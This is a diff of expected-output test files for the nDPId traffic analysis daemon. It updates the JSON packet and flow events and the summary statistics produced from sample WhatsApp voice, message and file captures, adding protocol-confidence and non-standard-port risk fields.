 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1432820681899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1432820681899,"pkt":"ABoRAAACABoRAAABCABFAAA8YBFAAEAG998KCAABnlU6bcI5FGZRO+t+AAAAAKACOQiNYgAAAgQFtAQCCAoABItvAAAAAAEDAwQ="}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1432820681901,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1432820681901,"pkt":"ABoRAAACABoRAAABCABFAAAoAFlAABAGh6yeVTptCggAARRmwjmuxBSBUTvrf1AS\/\/\/2ZgAA"}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1432820681901,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1432820681901,"pkt":"ABoRAAACABoRAAABCABFAAAoYBJAAEAG9\/IKCAABnlU6bcI5FGZRO+t\/rsQUglAQOQi9XwAA"}
-00627{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":214,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432820681899,"flow_last_seen":1432820685106,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":254,"flow_tot_l4_payload_len":1423,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432820685106,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.109","src_port":49721,"dst_port":5222,"l4_proto":"tcp","ndpi": {"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
-00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432820681899,"flow_last_seen":1432820685106,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":254,"flow_tot_l4_payload_len":1423,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432820685106,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.109","src_port":49721,"dst_port":5222,"l4_proto":"tcp","ndpi": {"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
-00653{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":225,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1432820558921,"flow_last_seen":1432820572412,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":2486,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1432820691631,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"184.173.179.46","src_port":35480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820681899,"flow_last_seen":1432820681935,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1432820681935,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.109","src_port":49721,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
+00831{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":225,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1432820558921,"flow_last_seen":1432820572412,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":2486,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1432820691631,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"184.173.179.46","src_port":35480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820693796,"flow_last_seen":1432820693796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1432820693796,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.5.199","src_port":51570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1432820693796,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1432820693796,"pkt":"ABoRAAACABoRAAABCABFAAA8Y3lAAEAGKR4KCAABnlUFx8lyAbsu9\/NsAAAAAKACOQjjKgAAAgQFtAQCCAoABJAVAAAAAAEDAwQ="}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1432820693846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1432820693846,"pkt":"ABoRAAACABoRAAABCABFAAAoAHNAABAGvDieVQXHCggAAQG7yXLRCAyTLvfzbVAS\/\/82fwAA"}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1432820693846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1432820693846,"pkt":"ABoRAAACABoRAAABCABFAAAoY3pAAEAGKTEKCAABnlUFx8lyAbsu9\/Nt0QgMlFAQOQj9dwAA"}
-00628{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1432820693796,"flow_last_seen":1432820695137,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":742,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.5.199","src_port":51570,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"}}
-00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1432820693796,"flow_last_seen":1432820695137,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":742,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.5.199","src_port":51570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00627{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1432820624900,"flow_last_seen":1432820633508,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":968,"flow_tot_l4_payload_len":3069,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.42","src_port":44819,"dst_port":5222,"l4_proto":"tcp","ndpi": {"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
-00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1432820624900,"flow_last_seen":1432820633508,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":968,"flow_tot_l4_payload_len":3069,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.42","src_port":44819,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00668{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1432820633802,"flow_last_seen":1432820681629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":505,"flow_tot_l4_payload_len":2241,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.192.222.189","src_port":42241,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820568947,"flow_last_seen":1432820628171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.252.121.1","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820569427,"flow_last_seen":1432820629171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"179.60.192.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820570876,"flow_last_seen":1432820631171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.93.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820570006,"flow_last_seen":1432820630172,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.79.192","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1432820571488,"flow_last_seen":1432820632171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":806,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.73.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820568346,"flow_last_seen":1432820627171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.64.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820567917,"flow_last_seen":1432820626171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.74.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820567259,"flow_last_seen":1432820625171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.84.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00666{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1432820681899,"flow_last_seen":1432820691973,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":254,"flow_tot_l4_payload_len":1783,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.109","src_port":49721,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
-00176{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","total-events-serialized":91}
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820693796,"flow_last_seen":1432820694164,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432820694164,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.5.199","src_port":51570,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1432820693796,"flow_last_seen":1432820695137,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":742,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.5.199","src_port":51570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
+00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1432820624900,"flow_last_seen":1432820633508,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":968,"flow_tot_l4_payload_len":3069,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.42","src_port":44819,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
+00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1432820633802,"flow_last_seen":1432820681629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":505,"flow_tot_l4_payload_len":2241,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.192.222.189","src_port":42241,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820568947,"flow_last_seen":1432820628171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.252.121.1","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820569427,"flow_last_seen":1432820629171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"179.60.192.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820570876,"flow_last_seen":1432820631171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.93.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820570006,"flow_last_seen":1432820630172,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.79.192","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1432820571488,"flow_last_seen":1432820632171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":806,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.73.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820568346,"flow_last_seen":1432820627171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.64.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820567917,"flow_last_seen":1432820626171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.74.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820567259,"flow_last_seen":1432820625171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.84.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1432820681899,"flow_last_seen":1432820691973,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":254,"flow_tot_l4_payload_len":1783,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.109","src_port":49721,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
+00176{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","total-events-serialized":88}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 261/261
 ~~ skipped flows.............: 0
 ~~ total layer4 data length..: 14389 bytes
-~~ total detected protocols..: 11
+~~ total detected protocols..: 13
 ~~ total active/idle flows...: 13/13
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4636286 bytes
-~~ total memory freed........: 4636286 bytes
-~~ total allocations/frees...: 99859/99859
+~~ total memory allocated....: 4716263 bytes
+~~ total memory freed........: 4716263 bytes
+~~ total allocations/frees...: 101447/101447
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 181 chars
-~~ json string max len.......: 680 chars
-~~ json string avg len.......: 500 chars
+~~ json string max len.......: 836 chars
+~~ json string avg len.......: 578 chars
diff --git a/test/results/whatsappfiles.pcap.out b/test/results/whatsappfiles.pcap.out
index d8b97e6d2..d72908dd9 100644
--- a/test/results/whatsappfiles.pcap.out
+++ b/test/results/whatsappfiles.pcap.out
@@ -3,16 +3,16 @@
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1519924083411,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1519924083411,"pkt":"XEl5dU5qkLkxKPrKCABFAABAAABAAEAG5oDAqAIduTzYNcIKAbs8JoRvAAAAALDC\/\/8eywAAAgQFtAEDAwYBAQgKKOUV+QAAAAAEAgAA"}
